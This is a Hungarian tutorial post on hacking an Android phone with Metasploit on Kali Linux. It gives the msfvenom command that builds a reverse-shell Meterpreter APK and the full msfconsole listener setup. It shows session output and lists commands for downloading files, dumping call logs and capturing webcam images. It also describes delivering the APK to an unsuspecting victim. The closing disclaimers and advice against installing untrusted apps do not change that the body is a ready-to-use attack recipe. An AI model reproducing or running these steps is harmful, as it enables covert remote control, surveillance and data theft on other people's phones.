Nezzuk meg az alabbi kis videot, ahol azt targyaljak, hogy van 1-2 exploit androidban, amit meg mindig ki lehet hasznalni. Ezaltal gyakorlatilag (egy telepitett apk file utan) az egesz rendszerhez hozzafer a Hacker. Mivl ez egy defconos video igy nem illegalis.
Es akkor nezzuk konkretabban hogyan csinaljak: MetaSploit nevu kis cuccot hasznaljuk erre a celra, ami Kali Linux alatt van, es azt a celt szolgalja, hogy minel jobban le tudd tesztelni a rendszert.
Ehhez fogunk hasznalni par dolgot:
- Oracle VirtualBox
- Kali Linux 1.1 vagy 2.0 (en 1.1-et hasznaltam)
- sajat androidos telefon vagy egy VM-es ISO android-al
Meg fogjuk hackelni a sajat telefonunkat, a sajat halozatunkon!!! Az osszes informaciot a youtube-rol szedtem enis, aki angolul tud az konnyen atlathatja jobban a dolgot.
Telepitjuk VB-t, vagy ezek utan letoltjuk a szukseges ISO-kat, felrakjuk Kali Linuxot VirtualBoxra.
Elinditjuk a Kalit. (Live mod), majd nyitunk egy terminalt.
Mostmar a metasploit-ot fogjuk hasznalni!
A terminalba irjuk a kovetkezoket:
msfvenom -p android/meterpreter/reverse_tcp LHOST=[SAJAT IP-d] LPORT=[AKARMILYEN PORT] R > app.apk
Es ennyi gyakorlatilag, ez a kliens resze mondhatni.
Nezzuk a lenyeges reszeket, ami ezutan kovetkezik..
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [SAJAT IP-d]
set LPORT [AKARMILYEN PORT]
exploit
[*] Started reverse handler on 192.168.0.*:4444
[*] Starting the payload handler...
General egy app.apk filet, amit a gyanutlan user ha elindit, akkor latszolag semmi sem tortenik...(olyan, mintha el sem indult volna, de amint elindul, kihasznalja az exploitot)
Ezt az apk filet a hacker eljuttatja az aldozatnak es kesz is a baj. Megvarja, mig lefuttatja az apk-t...
Az elso parancs elinditja a metasploit console-jat. A kovetkezoben megmondjuk, hogy egy multi handler-t akarunk hasznalni. Beallitjuk a payload-ot, ami ugyanaz, mint az elso sorban volt ugye. (reverse_tcp payload)
Majd beallitjuk a sajat IP-nk, es PORT-unkat, hiszen majd a kliens ide fogja kuldeni az adatokat erre a portra. Ez egy sima socket kapcsolat. A metasploit erre a celra irt szerver reszet nem latom, ezert nem tudom megmondnai, hogy tenylegesen mit csinal. Az apk-t visszafejtve arra jutottam, hogy gyakorlailag egy sima connectiont hoz letre a megadott adatokkal (itteni ip, port) majd finish-el az app, stb. Ilyenkor aktivalodik a session gyakorlatilag magaban a metasploit-ban, azaz kapjuk a kovetkezo dolgokat a Terminalban:
[*] Sending stage (40248 bytes) to 192.168.0.*
[*] Meterpreter session 1 opened (192.168.0.*:4444 -> 192.168.0.28:59439) at yyyy-mm-dd...
Ok.
Sajat IP-t a Kali Linux terminalban ifconfig parancssal kapjuk meg.
A sessiont a hacker megszerezte, azaz elerheti a telefonod.
Lassuk miket tud elerni a metasploit terminalon keresztul:
cd
cat
mkdir
ls
rm
rmdir
upload
download
dump_calllog
sysinfo
webcam_snap
webcam_stream
Gyakorlatilag azert sokkal tobb dolgot, de most csak ennyit masoltam be. Vicces, hogy egy exploitot kihasznalva a hacker akarmit megtehet az android mobilunkkal..
Le tudja tolteni a filejainak, feltolteni tud dolgokat, a webkamerarol realtime kepet es stream-et tud lementeni, ugy hogy a telefon be sincs kapcsolva!!!! Szerencsere azert exploitokat talalni eleg nehez es maceras.
ES VEGUL: A LEIRTAK SZIGORUAN OKTATASI JELLEGGEL TORTENTEK, HOGY LASSUK ILYEN IS VAN, NEM VALLALOK FELELOSSEGET ERTE, HA KIPROBALOD. IGAZ EZ ITT CSAK MAGANHALOZATON MUKODIK, TEHAT MASIK IP-VEL NEM.
Es vegul, a fenti hack modszer hibai:
1, A Szerver listenert le kell futtatni a metasploitban, kali linuxon, es varni ameddig az aldozat el nem inditja az android appot.
2, Az android egy csodas dolog, igy maga az OP rendszer kilovi egy ido utan az apk-t, igy a kapcsolat megszakad. Visszafejtve az apk-t arra a megallapitasra jutottam, hogy minimum egy foregroundService-el kellett volna megirni jol.
3, A kapcsolat barmikor megszakadhat, mondjuk eleg hozza egy net szakadas.
4, A fenti generalt .apk tehat rosszul van megirva, illetve a metasploit ezen resze is rosszul van megirva.
5, Ha a kapcsolat megszakadt, akkor ujra exploit-ot kell futtatnunk a terminalban, mivel ekkor mar a szerver listener sem fog futni...
6. Ez a metasploit cucc tenyleg csak tesztelesre jo.
7, A help-el megkapott parameterek kozul nem mindegyik jo.
8, Nem probaltam ugyan, de elvileg 5.0-ban nem mukodik. (Talan patch van ra?)
Vegezetul #2:
1, Sose hasznalj olyan apk-t vagy alkalmazast, amirol nem tudod, hogy megbizhato a tartalma. Erre az sem garancia, hogy Google Play-ben fent van! En pl. ezert is fejtettem vissza ezt a metasploit altal generalt apk-t, mert nem biztam bennuk.
2, Ha mar etikus hackelgetnel, akkor sajat magad altal irt dologgal tedd, mert abbol legalabb tanulsz is, es tudod mi van a kodban.
3, A hackerkedes tanulasra jo, mason elkovetni BUNCSELEKMENY!